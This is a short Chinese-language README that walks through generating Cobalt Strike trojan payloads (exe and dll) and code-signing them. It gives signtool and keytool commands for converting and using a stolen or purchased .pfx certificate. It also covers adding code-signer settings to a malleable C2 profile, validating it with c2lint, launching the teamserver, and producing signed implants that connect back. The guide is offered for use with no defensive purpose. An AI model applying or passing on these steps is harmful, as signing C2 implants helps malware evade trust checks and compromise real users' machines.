CS生成木马+证书签名


README.md

CS生成木马+证书签名

用微软signtool工具直接签名:


signtool.exe sign /f C:\Users\work\Desktop\xxx.pfx /p xxx /t http://timestamp.digicert.com xxx.exe


CS生成木马(exe、dll)+签名:


1、fpx转jks(需输入三次密码,前两次为设置新密码,第三次输入证书原密码):


keytool -importkeystore -srckeystore xxx.pfx -srcstoretype pkcs12 -destkeystore xxx.jks -deststoretype JKS


2、查看证书信息(主要看alias别名信息,后续修改配置会用到,上图转换过程中也显示出来了):
keytool -list -v -keystore xxx.jks

3、修改c2配置文件,添加修改code-signer相关字段值:



4、测试配置文件是否正确:


./c2lint test.profile


5、运行cs,加载配置文件:


./teamserver x.x.x.x password test.profile


6、连接C2,生成签名马:




正常运行上线:




PS:经测试,其实证书不用转换格式,pfx也可以:)

About

阅读前,请务必阅读《阅读指南》

Notice

接各类后端开发业务,老板可联系~

Contact

邮箱:xb@whitecap100.org